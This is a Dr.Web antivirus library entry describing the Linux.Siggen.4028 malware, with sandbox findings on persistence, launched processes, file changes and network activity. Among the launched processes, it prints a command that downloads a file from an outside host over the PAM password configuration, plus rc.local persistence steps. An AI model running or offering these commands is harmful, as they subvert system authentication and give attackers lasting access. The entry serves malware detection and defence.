La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Linux.Siggen.4028

Aggiunto al database dei virus Dr.Web: 2021-07-03

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/rc.local
Malicious functions:
Manages services:
  • systemctl enable rc-local
  • systemctl start rc-local.service
Launches processes:
  • /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/bash <SAMPLE_FULL_PATH> -c
  • wget -qO- https://icanhazip.com
  • ip -o -4 route show to default
  • awk {print $5}
  • wget -O /etc/pam.d/common-password https://www.zikristore.my.id/setup/password
  • chmod +x /etc/pam.d/common-password
  • cat
  • chmod +x /etc/rc.local
  • sed -i $ i\echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6 /etc/rc.local
  • apt update -y
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.T9K2J6 /tmp/apt.data.aKVII5
  • /usr/lib/apt/methods/bzip2
  • /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.cLO8gr /tmp/apt.data.UBt5Cv
  • apt upgrade -y
Kills the following processes:
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/bzip2
Performs operations with the file system:
Modifies file access rights:
  • /etc/pam.d/common-password
  • /etc/rc.local
  • /etc/sedZMs5oj
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/cache/apt/pkgcache.bin.L5rhfA
Creates or modifies files:
  • /etc/pam.d/common-password
  • /etc/systemd/system/rc-local.service
  • /tmp/sh-thd-190117057
  • /proc/sys/net/ipv6/conf/all/disable_ipv6
  • /etc/sedZMs5oj
  • /var/lib/apt/lists/lock
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /tmp/apt.sig.T9K2J6
  • /tmp/apt.data.aKVII5
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
  • /tmp/fileutl.message.x9BTTu
  • /tmp/fileutl.message.x9BTTu (deleted)
  • /tmp/apt.sig.cLO8gr
  • /tmp/apt.data.UBt5Cv
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2
  • /var/lib/dpkg/lock
  • /var/cache/apt/pkgcache.bin.L5rhfA
  • /tmp/fileutl.message.82unuO
Deletes files:
  • /tmp/sh-thd-190117057
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /tmp/apt.sig.T9K2J6
  • /tmp/apt.data.aKVII5
  • /tmp/fileutl.message.x9BTTu
  • /tmp/apt.sig.cLO8gr
  • /tmp/apt.data.UBt5Cv
  • /var/cache/apt/pkgcache.bin
  • /var/cache/apt/srcpkgcache.bin
  • /tmp/fileutl.message.82unuO
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 10#.#8.6.156:0
  • 10#.#8.7.156:0
  • [2#####700::6812:69c]:0
  • [2#####700::6812:79c]:0
  • 10#.##.6.156:443
  • 10#.##7.9.207:443
  • 15#.##1.66.132:80
  • 15#.##1.130.132:80
  • 15#.##1.194.132:80
HTTP GET requests:
  • se######.#####n.org/dists/jessie/updates/InRelease
  • ft#.##.######.org/debian/dists/jessie/InRelease
  • ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
  • ft#.##.######.org/debian/dists/jessie/Release.gpg
  • ft#.##.######.org/debian/dists/jessie/Release
  • se######.######.##g/dists/jessie/updates/main/source/Sources.bz2
DNS ASK:
  • ic###azip.com
  • ww#.###ristore.my.id
  • ft#.##.debian.org
  • se####ty.debian.org
Sends data to the following servers:
  • 10#.##.6.156:443
  • 10#.##7.9.207:443
Receives data from the following servers:
  • 10#.##.6.156:443
  • 10#.##7.9.207:443
Other:
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number